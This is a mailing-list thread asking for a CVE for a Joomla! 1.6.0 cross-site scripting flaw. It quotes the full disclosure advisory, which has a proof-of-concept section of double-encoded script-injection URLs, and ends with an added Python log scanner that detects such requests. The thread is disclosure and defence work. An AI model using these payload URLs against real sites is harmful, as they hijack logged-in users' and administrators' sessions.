Date: Fri, 18 Mar 2011 14:04:57 +0800
From: YGN Ethical Hacker Group <lists@...g.net>
To: oss-security@...ts.openwall.com
Cc: Josh Bressers <bressers@...hat.com>, coley <coley@...re.org>
Subject: Re: CVE Request: Joomla! 1.6.0 | Cross Site Scripting
 (XSS) Vulnerability

I didn't happen to ask for a CVE for Joomla 1.5.20.
Please assign a new one or tie this CVE to 1.5.20 as well.

Thanks!


On Tue, Mar 15, 2011 at 4:51 AM, Josh Bressers <bressers@...hat.com> wrote:
> Please use CVE-2011-1152
>
> Did the original report for 1.5.20 get a CVE id? (I couldn't find one)
>
> Thanks.
>
> --
>    JB
>
>
> ----- Original Message -----
>> ==========================================
>> Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability
>> ==========================================
>>
>>
>> 1. OVERVIEW
>>
>> Joomla! 1.6.0 was vulnerable to Cross Site Scripting.
>>
>>
>> 2. PRODUCT DESCRIPTION
>>
>> Joomla is a free and open source content management system (CMS) for
>> publishing content on the World Wide Web and intranets. It comprises a
>> model–view–controller (MVC) Web application framework that can also be
>> used independently.
>> Joomla is written in PHP, uses object-oriented programming (OOP)
>> techniques and software design patterns, stores data in a MySQL
>> database, and includes features such as page caching, RSS feeds,
>> printable versions of pages, news flashes, blogs, polls, search, and
>> support for language internationalization.
>>
>>
>> 3. VULNERABILITY DESCRIPTION
>>
>> The Query String parameter was not properly sanitized upon submission
>> to the /index.php url, which allows an attacker to conduct a Cross Site
>> Scripting attack. This may allow an attacker to create a specially
>> crafted URL that would execute arbitrary script code in a victim's
>> browser.
>>
>>
>> 4. VERSION AFFECTED
>>
>> Joomla! 1.6.0
>>
>>
>> 5. PROOF-OF-CONCEPT/EXPLOIT
>>
>> >>> SEO-enabled Joomla 1.6.0
>>
>> http://attacker.in/joomla160/index.php/%2522%253E%253Cimg%2520src%253Da%2520onerror%253Dalert(String.fromCharCode(88,83,83))%253E09739572178%252F
>>
>> http://attacker.in/joomla160/index.php/using-joomla/extensions/components/search-component/search/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E
>>
>> http://attacker.in/joomla160/index.php/contact-us/'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E
>>
>> http://attacker.in/joomla160/index.php/park-links?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1
>>
>> http://attacker.in/joomla160/index.php/using-joomla/extensions/templates?'%2522%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E=1
>>
>>
>> >>> SEO-disabled Joomla 1.6.0
>>
>> http://attacker.in/joomla160x/index.php?option=com_weblinks&view=category&id=18&Itemid=227&a86a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9666d64388c=1
>>
>> http://attacker.in/joomla160x/index.php?option=com_content&view=category&layout=blog&id=21&Itemid=268&%2522%253e%253cscript%253ealert%280%29%253c/script%253e=XSS
>>
>>
>> This is exactly the same variant as shown in last year's demo video
>> in 1.5.20:
>>
>> http://yehg.net/lab/pr0js/training/view/misc/joomla-1.5.20_encoded-xss/
>>
>> We thought the Joomla! team would fix this issue in the 1.6.0 stable
>> release whilst they fixed it in Joomla! 1.5.21!
>>
>>
>> 6. IMPACT
>>
>> Attackers can compromise a currently logged-in user/administrator
>> session and impersonate arbitrary user actions available under
>> /administrator/ functions.
>>
>>
>> 7. SOLUTION
>>
>> Upgrade to Joomla! 1.6.1 or higher
>>
>>
>> 8. VENDOR
>>
>> Joomla! Developer Team
>> http://www.joomla.org
>>
>>
>> 9. CREDIT
>>
>> This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
>> Ethical Hacker Group, Myanmar.
>>
>>
>> 10. DISCLOSURE TIME-LINE
>>
>> 2011-01-24: notified vendor
>> 2011-03-08: vendor released fix
>> 2011-03-14: vulnerability disclosed
>>
>>
>> 11. REFERENCES
>>
>> Original Advisory URL:
>> http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.0]_cross_site_scripting(XSS)
>> Former Advisory URL:
>> http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.5.20]_cross_site_scripting(XSS)
>> XSS FAQ: http://www.cgisecurity.com/xss-faq.html
>> OWASP Top 10:
>> http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
>> CWE-79: http://cwe.mitre.org/data/definitions/79.html
>>
>>
>> #yehg [2011-03-14]
>>
>>
>>
>>
>> ---------------------------------
>> Best regards,
>> YGN Ethical Hacker Group
>> Yangon, Myanmar
>> http://yehg.net
>> Our Lab | http://yehg.net/lab
>> Our Directory | http://yehg.net/hwd
>
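
A log-review check for the request shape in the quoted advisory, added here as an example (it is not code from the advisory, from Joomla!, or from anyone in this thread): it percent-decodes each path segment, query parameter name and query parameter value until the text stops changing, then reports any field that ends up containing HTML metacharacters, along with how many decode rounds that took. The access-log lines are constructed and the function names are this example's own.

```python
import re
from urllib.parse import unquote, urlsplit

MAX_ROUNDS = 5                      # bound on decode passes per field
MARKUP = re.compile(r'[<>"]')       # characters that break out of a tag or attribute
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines: addresses, times and sizes are made up
    '192.0.2.10 - - [14/Mar/2011:10:00:01 +0000] "GET /joomla160/index.php/contact-us HTTP/1.1" 200 5120',
    '192.0.2.11 - - [14/Mar/2011:10:00:07 +0000] "GET /joomla160/index.php/contact-us/%2522%253E%253Cimg%2520src%253Da%253E HTTP/1.1" 200 5344',
    '192.0.2.11 - - [14/Mar/2011:10:00:09 +0000] "GET /joomla160/index.php?option=com_content&id=21&%2522%253e%253cb%253e=1 HTTP/1.1" 200 5290',
]

def decode_fully(s):
    """Percent-decode until the string stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        nxt = unquote(s)
        if nxt == s:
            break
        s, rounds = nxt, rounds + 1
    return s, rounds

def inspect_target(target):
    """Return (field, decode_rounds, decoded_text) for each field holding markup."""
    parts = urlsplit(target)
    fields = [("path", seg) for seg in parts.path.split("/")]
    for pair in filter(None, parts.query.split("&")):
        name, _, value = pair.partition("=")
        fields += [("param-name", name), ("param-value", value)]
    findings = []
    for where, raw in fields:
        text, rounds = decode_fully(raw)
        if MARKUP.search(text):
            findings.append((where, rounds, text))
    return findings

def scan(lines):
    """Run inspect_target over access-log lines; prefix findings with line number."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m:
            hits += [(n,) + f for f in inspect_target(m.group(1))]
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A decode depth of 2 or more on a field that ends up containing markup is the case a single-pass input filter does not see, and checking parameter names as well as values covers the SEO-disabled form of the request.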
